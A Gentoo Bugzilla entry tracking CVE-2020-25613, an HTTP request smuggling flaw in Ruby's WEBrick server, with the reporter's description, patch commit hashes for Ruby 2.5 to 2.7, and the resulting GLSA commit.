Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 747007 (CVE-2020-25613)

Summary: <dev-lang/ruby-{2.5.9,2.6.7,2.7.3}: HTTP Request Smuggling Vulnerability in WEBrick (CVE-2020-25613)
Product: Gentoo Security Reporter: filip ambroz <filip.ambroz>
Component: VulnerabilitiesAssignee: Gentoo Security <security>
Status: RESOLVED FIXED    
Severity: minor CC: ajak, ruby
Priority: Normal    
Version: unspecified   
Hardware: All   
OS: Linux   
URL: https://www.ruby-lang.org/en/news/2020/09/29/http-request-smuggling-cve-2020-25613/
See Also: https://bugs.ruby-lang.org/issues/17201
Whiteboard: A4 [glsa+]
Package list:
Runtime testing required: ---

Description filip ambroz 2020-10-07 07:01:06 UTC
An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously. An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request Smuggling attack.

GitHub Commit:
https://github.com/ruby/webrick/commit/8946bb38b4d87549f0d99ed73c62c41933f97cc7

Links:
https://nvd.nist.gov/vuln/detail/CVE-2020-25613
https://osint.geekcq.com/2020/10/06/cve-2020-25613/

Reproducible: Always
Comment 1 Hans de Graaff gentoo-dev Security 2020-10-09 08:00:53 UTC
dev-lang/ruby 2.7.2 has been added.

We do not package the webrick gem.

Upstream has not released new versions for the ruby 2.5 and 2.6 slots. I assume that this will be released shortly as well. If not then we can apply the patch sets from the referenced bug.
Comment 2 John Helmert III archtester Gentoo Infrastructure gentoo-dev Security 2021-07-24 17:50:30 UTC
Ruby 2.5 patch: d6d2f179b02855ce07e8a114b3611dfc1f590986
Ruby 2.6 patch: 8b49c3e4bc767bec8a66ac81cbda033330fb2703
Ruby 2.7 patch: 48ac73769772317d6c3f864f087ef930a47120d9

ruby $ git tag --contains d6d2f179b02855ce07e8a114b3611dfc1f590986
v2_5_9

ruby $ git tag --contains 8b49c3e4bc767bec8a66ac81cbda033330fb2703
v2_6_7
v2_6_8

ruby $ git tag --contains 48ac73769772317d6c3f864f087ef930a47120d9
v2_7_3
v2_7_4

3.0.0 is unaffected (it's always had the patch). Just waiting for 2.5 cleanup here now, removal in a couple weeks.
Comment 3 NATTkA bot gentoo-dev 2021-07-29 17:25:47 UTC
Package list is empty or all packages have requested keywords.
Comment 4 Larry the Git Cow gentoo-dev 2024-01-24 04:07:58 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/data/glsa.git/commit/?id=aea6781bb25fe500e38a2cfce23bf166d29cbf48

commit aea6781bb25fe500e38a2cfce23bf166d29cbf48
Author:     GLSAMaker <glsamaker@gentoo.org>
AuthorDate: 2024-01-24 04:04:06 +0000
Commit:     John Helmert III <ajak@gentoo.org>
CommitDate: 2024-01-24 04:06:47 +0000

    [ GLSA 202401-27 ] Ruby: Multiple vulnerabilities
    
    Bug: https://bugs.gentoo.org/747007
    Bug: https://bugs.gentoo.org/801061
    Bug: https://bugs.gentoo.org/827251
    Bug: https://bugs.gentoo.org/838073
    Bug: https://bugs.gentoo.org/882893
    Bug: https://bugs.gentoo.org/903630
    Signed-off-by: GLSAMaker <glsamaker@gentoo.org>
    Signed-off-by: John Helmert III <ajak@gentoo.org>

 glsa-202401-27.xml | 65 ++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 65 insertions(+)